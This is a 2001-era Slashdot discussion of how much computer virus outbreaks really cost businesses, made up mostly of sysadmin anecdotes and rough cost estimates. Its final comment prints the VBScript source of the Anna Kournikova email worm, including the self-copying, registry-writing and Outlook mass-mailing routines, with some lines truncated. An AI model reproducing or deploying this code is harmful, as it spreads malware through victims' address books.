How Much Do Computer Virus Attacks Really Cost? 325
An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.
Data point: $10/computer/year (Score:1)
zero cost if you run IBM OS/2 (Score:1)
Re:What does reputation cost? (Score:1)
Re:Stupidity (Score:1)
*yawn* (Score:1)
It is company policy not to open electronic mail messages containing attachments, or to receive or transmit electronic messages of a non-work-related nature. It is agreed by all parties that violating this policy will result in immediate dismissal.
Re:How do you calculate lost WASTED time? (Score:1)
If a vb script virus is transmitted by someone opening an 'I love you' or 'AnnaKournekova.jpg' how much productivity are you REALLY losing? They just don't have as much time to waste. I suppose it could have a terrible impact on morale...
Lord knows my morale plummeted this morning when I discovered that the hot nude pic of Anna Kournikova that somebody had emailed me was, in fact, just some lame Windows virus..
Virus cost? What about Windows cost? (Score:1)
We spent much more time dealing with Windows-related problems (with 80 users, wipe and reinstall Win9x on 2-3 machines per month) than we did with viruses. So I'd like to see a study on the labor costs of using Windows - it might dwarf the cost of virus infections.
How much did US Buisnesses gain? (Score:1)
that depends on (Score:1)
the first thing that goes when the next big virus hits my company is my sanity.
this is because multiple messages are sent to all saying
"the message with as a subject line is a virus, don't open it. get your virus update here"
and then you see 10 messages right after it with the afore mentioned subject.
I don't know why these people have an email account anyway, they can't f*cking read.
I hate monday.
Here you have,
damnit.
Re:How much do virus *myths* cost businesses? (Score:1)
"We have the right to believe at our own risk any hypothesis that is live enough to tempt our will."
Re:The real cost of viruses... $$ AND time (Score:1)
Correct me if I'm wrong, but isn't the "real work" of a sysadmin exactly that - maintenence?
--
doesn't cost a dime (Score:1)
zero cost (Score:1)
Re:How much do virus *myths* cost businesses? (Score:1)
Re:The real cost of viruses... (Score:1)
Just a thought here. But doesn't it seem odd that ever 6 months to a year there is a really big email style virus that hits a large majority of the "not so bright" people out there?
Now most of these viruses don't do allot of damage like the good old viruses that ate the hd as fast as possible. But from what I've seen there is one cost I haven't seen mentiond yet...the virus checker. Ok they aren't teribly expensive, but most people who get these viruses and lack an IT Dept go buy the latest virus checker to fix the problem. Seems like the companies that make virus checkers are quite happy whenever there is a big virus that gets into all the "dense" peoples computers.
Which brings me to the thought of "what if the virus checker companies made and distributed the virus?". Good for sales, keeps them in business, and keeps the fear alive. But since I don't know anyone working for any of these companies I couldn't give any proof. But it still seems suspitious.
Plural of "virus" (Score:2)
See http://language.perl.com/misc/virus.html [perl.com].
causes... (Score:2)
I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.
But those things are not legitimately attributable to viruses. Those are attributable to hiring idiots for admins.
The rest of your post I agree with.
Re:How much do virus *myths* cost businesses? (Score:2)
Fah, I have a whole pile of systems that were deemed to be not Y2K compliant. Of all of them one required that the clock be reset, but only under Windows, it runs Linux just fine.
The rest of the world spent far less on their computer systems, and yet there lights stayed on. Y2K was a myth, for all intents and purposes. But it got rid of a lot of cruft, and it made a bunch of hardware and software companies very wealthy, so it wasn't all bad.
Re:Neither Macs nor *nix machines are immune (Score:2)
The chances of such a worm propagating are essentially nill. The trick worked in this one particular case because you happened to know exactly the software that your friend would be using. If your Applescript were sent to a Mac user that used some other email client it would have simply crashed. There simply aren't enough Mac Eudora users to sustain such a beast.
You tricked one guy (who you happened to know), but how many of the messages in his inbox were from Eudora using Mac addicts? And of those few who actually use the right type of software how many of them would open up any random jpeg from your buddy without poking at it a little first?
Microsoft is certainly responsible for creating software with such disregard for security. But it isn't the fact that all of the other email clients in the world are so much more secure that keeps their users from becoming targets, it is the fact that Windows + Outlook has the largest install base. There are scads of gullible Windows users, and there is a good chance that most of the addresses in a typical Windows User's address book are running the same sort of software.
Re:The real cost of viruses... (Score:2)
There is still lost time. For example, the system administrators probably had something else they needed to be doing. In most of the organizations I have worked for the sysadmins don't just sit around all day playing quake and waiting for a fire. The lost time simply applies to all of the things that the sysadmin could have accomplished if he hadn't been cleaning up viruses. If your systems adminstrators are only busy when you have a virus, eliminating viruses would allow you to cut back on the amount of systems adminstrators that you hire.
Also, there is the fact that when a virus epidemic hits there are generally more than one system affected. Email servers are shut off, multiple workstations re-formatted and re-seeded. The largest expense of nearly any business is its payroll (in the US anyway). If a part of a company's workforce is unable to work at peak capacity it is squandering it's most costly resource. Viruses often affect entire departments, and can cost real money to a business.
Re:OnTheFly Source (Score:2)
Re:Microsoft (Score:2)
Sorry, x86's since the 80286 have included multi-ring security. Too bad no one ever implemented anything with it...
sPh
Re:"Loss" == "IRS allows you to write it off". (Score:2)
Therefore things like software piracy, virus attacks, are not losses."
That's funny. My coworker and I, who are 100% scheduled from now through April 30th on an ERP implementation for a small manufacturing company, have spent the last three hours (and appear to have about 3 more to go, or a total of 12 manhours) working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny (and yes, I know the users shouldn't have clicked on that). Now, that's 12 manhours down the drain. Plus, when I arrive at the manufacturing site tomorrow, I won't be prepared for the work I was going to do, and another 8 hours or so of everyone's time will be wasted as we try to work through that unprepardness.
Now, exactly how is that NOT a cost?
sPh
How ironic. (Score:2)
The cost of virii is directly proportional to the stubbornness of both users and IT managers who refuse to get rid of programs like Outbreak which have repeatedly demonstrated this sort of problem, with no real remedy on the horizon. Infect me once, shame on you. Infect me twice, shame on me. Infect me three times, and I deserve to die because I'm not taking precautions!
--
Re:$0 since fall of 1998. (Score:2)
Outlook and Exchange come with the territory - it's be tougher for us to substitute a different mail system than the payback would justify.
Personally, I'd prefer a nice IMAP-based system that is less vulnerable to begin with, but if you manage the system carefully you can make the MS stuff work acceptably well - which is nice when you work at a company that's drank the Microsoft-branded Kool-Aid.
- -Josh Turiel
$0 since fall of 1998. (Score:2)
After that, we put up an SMTP scanner/gateway between our Exchange server and the rest of the world. I set up filters to automatically block anything executable at all via e-mail, including stuff like
The downside is that I'm the "no fun" admin (since we block all the fun programs from e-mail), but on the other hand I've counted 26 copies of the "Kournikova" worm today alone that have bounced off our server harmlessly. I think it was worth it for sure. Since I'm stuck with Windows for the forseeable future, I'm happy with what I can do to prevent these from affecting us.
So our ongoing cost to really deal with viruses is $0. But I do have software costs (annual licenses), plus some time spent devising our strategy and implementing it. But that's part of the job - I can't really call it "virus costs".
- -Josh Turiel
Re:Hope none of y'all are framing carpenters (Score:2)
Commercially available lengths usually start at 8 feet (96 inches) going up in length in multiples of 2 feet (24 inches).
A "stud" is usually 93 inches in length, which means that nailing them at right angles to a 1.5 inch thick bottom, or sole, plate and a 1.5 inch thick top plate results in an 8 foot wall. (In construction the question of when to say "foot" and when to say "feet" is answered "it depends")
If you remodel a house built in the early 1950's you'll find that the "2x4's" used back then are slightly wider and thicker (by either an eighth or a sixteenth of an inch, don't feel like going out in the rain to the shop to the woodbin with a tape measure just now) and the studs are shorter by double the thickness increase so that the wall is still 96 inches high.
Extrapolating back there was probably a time when 2x4's were 2 inches by 4 inches wide and thick (or thick and wide).
In the context of the original post, a 2x4 is a board that you can wrap your hands around and use to beat someone with or threaten to do so.
Re:Virus cost: (Score:2)
Re:Starting a virus is like arson. (Score:2)
Re:Starting a virus is like arson. (Score:2)
Re:"Loss" == "IRS allows you to write it off". (Score:2)
--
Re:Next to nothing, if you're doing your job. (Score:2)
"Real" viruses may have better luck getting in, but we're generally up to date with the updates.
As for Ghost, we'd use it (in fact, I've been pushing for it), but to get it done legit is expensive. Not a problem to me, but I don't always get the gear/utilities that I want because of price. Oh well.
Raptor
Next to nothing, if you're doing your job. (Score:2)
Under Windows, you do the following:
a) Install Norton on every machine
b) Pay for LiveUpdate
c) Set tight-fisted policy, so that anyone who breaks it realizes that it's their fault, and they *may* get bumped to the bottom of the queue
d) Use a mail server capable of decent filtering (procmail is excellent for this, and your unix box can relay to Exchange if you *really* need it)
e) Network profiles and user directories, with a solid backup rotation.
Of course, everyone here knew that, right?
I've dealt with this before. We've fixed it in a matter of minutes due to good policy, an extra box lying around, and a tight-fisted reign over the network.
Raptor
Not much $$$ for us.. (Score:2)
Very Little....Probably (Score:2)
From a pure production stand-point, we lost some $$ since we shut down the mail-swerver until we fixed it, but still, who knows? We lost a days worth of work for 12 people doing various production-related things, most of a day of my projects which have a direct impact on the entire company rather than a single dept., and we had no email for 6-8 hours which threw a kink into everyones communications. Hard to measure.
I did get some payback that day. Since we run an email-to-fax gateway, the 3-4 people who had a Contacts list full of fax addresses got to deal with a shit load of calls from irritated correspondants who were getting 10+ page faxes full of I Love You's code.
--
The question is... (Score:2)
But what happens when people start writing more insidious virues?
Say: flip a random bit in a random data file. Those bits add up over a few years, and even if you had two years' accumulated daily backup tapes, it would be nigh impossible to rebuild clean data from them. So what happens when you go to work one day, start troubleshooting a problem, and suddenly discover that you can't trust any of the data on any of your company's computers? And can't even confidently demonstrate which files are corrupt and which aren't?
Or: suppose someone uses a virus to cover a more sinister attack? The bank's IT staff congratulate themselves at how quickly they squashed a viral attack, not realizing that one of those messages had the same subject line and same
Other scenarios should be easy to come up with as well. The surprise is that the virus writers haven't come up with them yet. (Or haven't they?)
My point is: yes, headlines probably use grossly inflated figures for the cost of virus attacks, and yes, most of them could be shrugged off as annoying pranks. But will it always be that way? Rather than playing down the seriousness of viruses by pointing out cases of obvious or probable exaggeration, we should be trying to scare the bejesus out of our clients and employeers, before "the big one" comes along.
--
Re:OnTheFly Source (Score:2)
I saw something recently about how the anti-virus companies are starting to whinge about how the number of different compression schemes available out there makes it really hard to create signatures for all the viruses. Same virus, different compression ==> different signature required.
--
Other stats. (Score:2)
While we're at it, can we get some independent academic research into other unquestioned numbers such as losses due to piracy?
These estimates get quoted in a couple articles, then stated in court and suddenly they're real and no one wants to question them.
Re:How much do virus *myths* cost businesses? (Score:2)
A 2x4 is also at times known as a "clue stick."
Re:Personal estimate.. (Score:2)
And you can set up scheduled virus-scans in your Windows clients, make this part of the standard load image. My notebook Win2K client does it now.
Hovever, the general vulnerability of MS Windows software to viruses is a _great_ motivator for a company to look into using Linux on the desktops.
Give me an ever-better Wine to run MS Office apps, plus a Linux version of Lotus Notes, and SecureID SSL encryption ported to Linux, I won't use Win2K!
The best way to pay for the effects of viruses .. (Score:2)
This country (and, in many ways, the entire Western world) has been transformed into a place where there is no such thing as personal responsibility anymore. If you spill a cup of hot coffee on yourself, it's not your fault
I hereby call "bullshit" on this. People need to be taught a basic modicum of computer security common sense. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued? I'll tell you what: a moron who blindly clicks on and opens every single attachment they get will think twice about it if they have to put a couple of month's worth of mortgage payments on their credit cards because half of their paycheck went to paying the tech support guys to clean up the mess they created.
Viruses can be thwarted so that their effect is minimal, but this is not going to happen so long as user stupidity is coddled and encouraged and users who do stupid things are allowed to claim that it's "not their fault." It's not their fault that the virus was created, of course, but it is their fault that they did a very stupid thing that cost a lot of people a lot of money. If you start making people pay for their mistakes, you'll find that they wind up making a hell of a lot less mistakes.
Viruses *helped* our business prosper (Score:2)
But surreptitiously releasing a modified copy of "I Love You", we were able to determine with a high degree of accuracy which of our resources were, in fact, complete and total dipshits. After sending out a company wide email with the subject "WARNING: I Love You! DO NOT OPEN! VIRUS INSIDE!", many, many employees (mostly from legal and marketing) were immediately identified as being dipshits. We cut the fat, as it were, and are now a leaner, smarter organization better able to meet the challenges of the 21st century, sans dipshits.
Virus costs (Score:2)
Software licensing costs for anti-virus software are huge for a medium-to-large business. Also, the time spent in "what do we, as a company do about virii" is non-trivial.
In the ideal company, anti-xxxx tactics (where xxxx is any sort of intrusion, theft, vandalism, etc) would be left to the people who do the job, but this is rarely the case.
Re:Stupidity (Score:2)
Now about 'dem hossless carriges... 8^)
--
Productivity and Cost (Score:2)
Time is a finite resource that is closely linked to productivity. Productivity is linked to the completion of projects. When one's time is taken up by unscheduled workload (ie: the virus incident), current projects tend to suffer. That means the project either slips or more time has to be thrown at it. Where do you get that time? You hire more people to work the project, increasing the available manhours (time) and increasing the cost.
Whether these virus scares SHOULD cause such an impact on an organization's available time is an entirely different matter.
Same here... (Score:2)
If that isn't lost money, I don't what is!
We use Windows (unfortunately) for a lot of our stuff, and most everybody uses Outlook - I use Netscape, and I consequently DON'T HAVE A PROBLEM (Netscape doesn't know what to do with the attachments). Also, I uninstalled Windows Scripting, so that nips it as well.
I have tried repeatedly to get the IS dept or anyone who would listen to switch to something else, filter VBS scripts at the server - something: All to no avail, so far...
Worldcom [worldcom.com] - Generation Duh!
Re:Stupidity (Score:2)
The frightening thing to me - how the hell does McAfee get the data that makes up the map?
If I were running antivirus software, the last thing I'd want is to have it phoning home to tell some third party that I was infected.
Sounds like a privacy/security nightmare.
Starting a virus is like arson. (Score:2)
What's boneheaded about it? Can you think of a way requiring LESS down time to make SURE that the virus and anything it corrupted is removed from ANY computer at the company?
Starting a virus is like starting a fire - in this case one that burns through all the computers that are susceptable. After the fire is out the firemen are going to water the ashes and dig them up to make SURE it's out, and build firebreaks to keep it from relighting from the surrounding area (which may still be burning).
Re:Opportunity cost (Score:2)
No, I'm not. I explicitly took that into account with the "bank account" analogy for the time-difference in value of the money.
The cost in current dollars is the amount you have to put into the interest bearing account, in order to have the money to cover the shortfalls at the time they occur. Future withdrawals are a greater number of dollars then the initial deposit.
what it cost us (Score:2)
Sysadmin salary/120,000 minutes worked per year*10 minutes= $4.16
That's our total loss. If you decide to count the amount of time spent learning about viruses, that means you count the amount of time we spend with Bugtraq every morning, which we would do anyway, so that's a wash.
Yeah, $4.16. That's about right.
I agree, it's nothing (Score:2)
If that's so, then lost productivity because of a down 'down system' also is 'intangible', and therefore has no affect on 'cost'.
Hey, it's THEIR rules...
Re:VBS.SST@MM (Score:2)
Re:Caution: Anecdotal evidence (Score:2)
Y'know, it'd be cheaper to just make everyone click it and not have to worry about reinfection than to spend money on a virus scanner. Or hell, less money on bandwidth spent by clicking it than downloading a new definition file.
I don't understand (Score:2)
---
And Then... (Score:2)
What, you mean like... (Score:2)
Seriously though, you can quietly manage the whole thing. You don't have to have the whole company up in arms over it.
Fuzzy math (Score:2)
Re:OnTheFly Source (Score:2)
Anyone de-obscufed it?
Typically I'd have to say the numbers are wrong. (Score:2)
The real cost for a single instance of a virus is dealt with mostly costs in overtime for personnel while things are restored, inspected, and placed back into service.
The real cost overall is having to buy the software to protect against virii, and hiring the people that do nothing but guard the network. These costs don't contribute to the bottom, they merely protect it. This is the real cost of a good virus, it just usually isn't paid until someone catches something (when it should have been paid all along).
criminal economics (Score:2)
Like all other forms of crime, computer viruses actually make money for countless people.
From the products and salaries of virus companies, to cops salaries, to the salaries of reporters and other media, crime is great for absolutely everyone but a tiny irrelevant minority.
I was on site at a company in NY... (Score:2)
Seth
Re:I partially agree.... (Score:2)
But this doesn't follow. If there were no viruses at all, you wouldn't need to worry about them as a source of data problems, and you wouldn't need to spend the $24 per client for anti-virus software. What that means is that the threat of a virus alone is enough to force you to add costs, so there's a cost associated with viruses even for well run shops that don't actually get infected. It's not a direct cost, but it still exists.
Re:The best way to pay for the effects of viruses (Score:2)
Odd that you should mention this. I did determine which one of my users opened it first. And while I didn't go to the extreme that you said of taking money from his pocket... I did send out a company-wide email jokingly pointing the finger at him (I called him a dead man).
A little public humiliation can go a long way. I will guarantee you that he'll think twice about opening attachments from now on.
Re: (Score:2)
Simple Math... (Score:2)
According to the New McCafee Virus Map:
Luvbug.vbs infected
So, 10,000x$0.25 = $2500.00/day
Therefore - Today, Luvbug.vbs cost Americans $2,500.00 today...
Re:Simple Math... (Score:2)
above should read less than 10,000 infected systems
Re:Caution: Anecdotal evidence (Score:2)
I read one Slashdot article about viruses (this one), and am responding to it. Cost: two minutes.
'Nuff said.
Re:I think...Marketing of fear=sales (Score:2)
ILOVEYOU (Score:2)
How much they cost here (Score:2)
When a 'worm' or other VBS mayhem is rampant:
$ 110 per billable hour (average) x 10 minutes per hour to wade through excess mail $ 11 dollars per end user per hour. x 15 end users $ 165 per hour + 30 bucks an hour for my services = 195 per hour.
That's when there is an active .VBS worm running loose. These prolems have seldom lasted longer than 2 hours - and that is due to the mail admins living on the West Coast and not being available as soon as the East Coast facilities are hit.
Otherwise, I'd guestimate that I spend at the most 2 work hours per week on virus and work related issues - that's average. Some weeks more, some weeks less, some weeks none at all.
Above figures are for a small part of a larger manufacturing concern.
Re:How to Calculate Actual Cost (Score:2)
Re:I think...Marketing of fear=sales (Score:2)
Unfortunately, the number of people in the world who fit the description above is approximately 12. Most end-users are so pig-headedly stupid that they wouldn't know a virus if it were wearing a neon sign around it's neck. We actually had one user at my company that opened 7 different messages that had the subject "I love you" on the day of the Love Bug outbreak. And this was that afternoon, when a high priority alert had been sent out by out AV response team that morning!
People are stupid. In the work environment, we have to try to protect them from themselves. Once they leave the office though, they're on their own.
Re:"Loss" == "IRS allows you to write it off". (Score:2)
A virus has a cost associated with it. Cost of productivity. Can we write it off. Hmmm software bought to prevent it happening again, extra copnsultants brought into the firm to upgrade systems
That the way i see it.
How the tax sytems work I don't know but I would not be surprised if some-one could claim it if there was enough proof and well documented claim.
example:
Traveling salesman that has full account of his time in a writen ( hand ) log. He/She could put computer down time as a loss of sales and presentation for the amount of days the system was down, proratedly only for the days the computer would be used based on a historical documentation of the hand writen log file.
there was a great acticle in forbes magazine about how to manage your records for the IRS. This included those people that were gamblers and other types of people that have to keep a written log.
ONEPOINT
spambait e-mail
my web site artistcorner.tv hip-hop music news
please help me make it better
Lost productivity (Score:2)
The original love letter virus cost millions in lost productivity, because it crashed thousands of (Exchange) mail servers. Also, I lose productivity everytime I reboot, because I have to wait for Norton Virus scan to download new patterns and scan my hard drive. Also, on an older system, the virus scanner interacted with Netware to crash Windows every time it tried to boot up, which cost me several hours of lost work until the IT department finally relented and told me the password to disable the virus scan function!
Interesting to note, however, that all these costs were incurred only on systems running MICROS~1 software... the more interesting question is "How does the cost of virii to Windows users compare to the cost of virii on non-windows users?"
Should buffer-overflow (stack smashing) and root exploits be included in the costs analysis? If not, it seems like the costs to Linux users is zero...
Hidden cost (Score:2)
Why virus cost companies so much (Score:2)
About VBScript . . . (Score:3)
A flu virus?
The collophon claims this is a drawing of a Sea Urchin. I'm not convinced.
Geoff
Re:The real cost of viruses... (Score:3)
Let imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So thats the cost before you even talk about time.
Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average persons time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.
Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".
I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.
Is that supposed to be funny? (Score:3)
No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!
Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.
I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.
And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.
Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?
Personal estimate.. (Score:3)
But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners runs five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.
Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.
Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someones ass.
Caution: Anecdotal evidence (Score:3)
So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!
But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's harddrive.
The cost isn't because of viri it's from ... (Score:3)
Maybe these companies should be able to sue Microsoft, for lost time and money.
ANSWER: Where these numbers come from! (Score:3)
Small company of 100 people, open 250 days/year.
Annual GROSS income $5 million.
$5m/250days/8hours = $2500/hr.
Virus comes in, hits 24 people.
Sysadmin can fix a machine in 15 minutes, making for six hours of work. That's $15000 in lost revenue!!! Then add on the salary for the sysadmin and the staff when they're not working, and you've got 12hr at $50/hr (average salary,
including the CEO, who makes $2million in stock options), or another $600. Wow, almost $16k for a small company!!! (interesting aside: $16000/24 people comes to $666/person
Now, let's look at this rationally. The sysadmin (a) can probably do several machines simultaneously, and (b) is already getting paid for this sort of thing. It's his job! Then there's the staff, who for their 15 minutes of downtime might take their allotted coffee break, or maybe even do some (gasp!) paperwork!
For non-destructive viruses, I would guess the average cost to be about $5/seat infected. A far cry from the $666/seat calculated above. Here are some of the flaws that lead to this discrepancy:
1) All work time is computer time for all staff infected.
2) Time spent repairing the damage is outside of normal duties for the admin.
3) All staff work at 100% efficiency all of the time.
4) Time spent repairing the damage can't be done when the staff aren't around.
In other words, the numbers quoted are nothing more than so much bullshit.
Re:OnTheFly Source (Score:3)
McAfee seems to detect it (I'm not sure if by heuristics or if it has the signature), but Norton AntiVirus doesn't detect it...
What's interesting is how it decodes itself from the string. I kind of remember a couple VBS virus doing that earlier.
It could be much worse. Many of these script viruses could be enhanced so the vbs extension doesn't show, and to use a variable encoding keys, which would make it harder to create signatures.
Re:How much do virus *myths* cost businesses? (Score:3)
Any time you have an incident like this, go see the user personally with a pair of handcuffs and a 2x4. Gradually, as users become more enlightened about IS policy, you will see a decrease in these types of messages.
Re:The real cost of viruses... (Score:3)
Hey, street crime wouldn't cost anything if people all stayed inside.
Stupidity (Score:3)
Basically A map of stupidity...
Is Your State Stupid? [mcafee.com]
viruses cost me my sanity (Score:3)
Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha!this attachment is really a VB script!") He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.
I bet you all have this same guy working in your office. Admit it, it's probably you.
omega_rob -- friend of the bonsai kitten
How could it *not* cost a lot of money? (Score:3)
It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.
"Loss" == "IRS allows you to write it off". (Score:4)
Therefore things like software piracy, virus attacks, are not losses.
Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accoutanta don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and thay claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.
If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.
The real cost of viruses... (Score:4)
The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.
This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.
Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
Something to keep in mind... (Score:4)
Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected [vmyths.com], which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saing that only 10,000 machines had been hit.
</rant>
--
What does reputation cost? (Score:4)
-B
Re:Stupidity (Score:4)
--
Opportunity cost (Score:4)
- A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
- The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.
and so on.
Let's suppose it's a high-tek company on the rise. And lets suppose this delays its product introduction by one day.
Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.
Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.
Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.
(If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)
Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.
Computing the PROVABLE direct loss is another story entirely.
Re:How much do virus *myths* cost businesses? (Score:4)
OnTheFly Source (Score:4)
<BLOCKQUOTE>
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFold
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have,
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
